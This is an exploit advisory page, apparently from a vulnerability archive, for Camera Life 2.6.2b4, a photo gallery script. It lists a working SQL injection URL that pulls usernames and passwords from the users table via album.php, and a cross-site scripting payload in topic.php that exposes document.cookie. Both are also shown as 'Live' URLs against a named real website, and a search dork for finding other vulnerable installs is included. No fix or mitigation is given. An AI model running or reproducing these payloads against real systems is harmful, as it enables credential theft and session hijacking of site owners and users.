Camera Life 2.6.2b4 (SQL/XSS) Multiple Remote Vulnerabilities

2009.02.09
Credit: BackDoor
Risk: High
Local: No
Remote: Yes
CWE: CWE-89

Cameralife 2.6.2b4 (SQL/XSS) Multiple Remote Vulnerabilities Script:Cameralife 2.6.2b4 Download:http://nchc.dl.sourceforge.net/sourceforge/fdcl/cameralife-2.6.2b4.zip Author:BackDoor Bug 1;album.php Remote SQL Injection Vulnerability Exploit:www.target.com/scriptpath/album.php?id=-1+union+select+0,password,username,3,4,5+from+users Live http://chrisnolan.org/cameralife/album.php?id=-1+union+select+0,password,username,3,4,5+from+users Bug 2;topic.php XSS Vulnerability Exploit:www.target.com/scriptpath/topic.php?name="><script>alert(document.cookie)</script> Live http://chrisnolan.org/cameralife/topic.php?name="><script>alert(document.cookie)</script> Dork:inurl:"cameralife/index.php" BackDoor Cyber-Security.TIM //Lojistik


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top